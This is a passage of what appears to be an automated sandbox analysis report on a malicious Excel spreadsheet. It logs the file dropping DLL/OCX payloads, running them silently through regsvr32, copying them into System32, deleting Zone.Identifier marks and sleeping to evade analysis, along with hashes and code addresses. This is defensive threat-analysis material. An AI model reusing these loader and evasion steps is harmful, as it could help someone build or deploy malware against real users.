                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800136745_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F6785_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E2785_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180005E7C5_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025E885_2_0000000180025E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002868C5_2_000000018002868C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014E985_2_0000000180014E98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014AA45_2_0000000180014AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800126A85_2_00000001800126A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800036A85_2_00000001800036A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A6BC5_2_000000018002A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CABC5_2_000000018001CABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000EAC05_2_000000018000EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001B6D45_2_000000018001B6D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F2DC5_2_000000018000F2DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800202E05_2_00000001800202E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800226E05_2_00000001800226E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180019AF05_2_0000000180019AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BEF05_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180012EF85_2_0000000180012EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800297105_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800177105_2_0000000180017710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C7405_2_000000018000C740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020F445_2_0000000180020F44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180023B485_2_0000000180023B48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800237485_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800217545_2_0000000180021754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800223585_2_0000000180022358
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029F5C5_2_0000000180029F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B3685_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001BF705_2_000000018001BF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800253745_2_0000000180025374
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180007F745_2_0000000180007F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180021F7C5_2_0000000180021F7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800197885_2_0000000180019788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001B8C5_2_0000000180001B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800283945_2_0000000180028394
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013B945_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001479C5_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E7A05_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800087A45_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017BA85_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000EBAC5_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001B3B85_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180012BB85_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800257C05_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180008BC05_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800117C45_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800227E05_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_003B00006_2_003B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800083F86_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800264106_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000680F6_2_000000018000680F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025C306_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800136746_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017C8C6_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A48C6_2_000000018000A48C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BEF06_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800297106_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180026F146_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800237486_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001D586_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002B3686_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800013786_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800105906_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800091A86_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800165E46_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018FE86_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ABE86_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029DF06_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800243F46_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015DF46_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800011F46_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800247FC6_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DBFC6_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000FE086_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001100C6_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180027E146_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000B6186_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800232206_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180027C286_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020A346_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800076346_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180022E386_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E6386_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002143C6_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001303C6_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A8406_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800038406_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000B4446_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F0486_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002AC4C6_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800100506_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800102506_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800030506_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011E5C6_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000445C6_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C85C6_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800034606_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180026A646_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800042646_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029C6C6_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001586C6_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000406C6_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E06C6_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BC706_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F6786_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E2786_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001447C6_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180005E7C6_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74F7FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF70C7FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF706BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF7067FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF70CBD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74FBD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00000001800153F4 appears 48 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D27FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF706B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74FB3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF70CB3B0 appears 148 times
                      Source: Datei_26744565.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: Datei_26744565.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll 52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll 306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
                      Source: Datei_26744565.xlsReversingLabs: Detection: 39%
                      Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocxJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR55EC.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@17/18@4/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: Datei_26744565.xlsOLE indicator, Workbook stream: true
                      Source: Datei_26744565.xls.0.drOLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029710 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,4_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Datei_26744565.xlsInitial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006951 pushad ; retf 3_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180006951 pushad ; retf 5_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180006951 pushad ; retf 7_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006951 pushad ; retf 9_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: T35PENELLOsp[1].dll.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x5caa2
                      Source: Jf8[1].dll.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x5ef33
                      Source: uxevr1.ocx.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x5ef33
                      Source: 1Cb5zOjLgWGDemz55C5[1].dll.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x64194
                      Source: uxevr3.ocx.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x64194
                      Source: uxevr2.ocx.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x644de
                      Source: 4HWP0KQI[1].dll.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x644de
                      Source: uxevr4.ocx.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x5caa2
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\MreGm\Zazriwdkuo.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\AnDDvm\lwQjfM.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\IvkabqgmpEJ\fEKh.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1484Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2368Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2104Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1812Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 324Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1156Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2252Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1288Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-16379
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.6 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.6 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.7 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.7 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,4_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,8_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,10_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16381
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16530
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
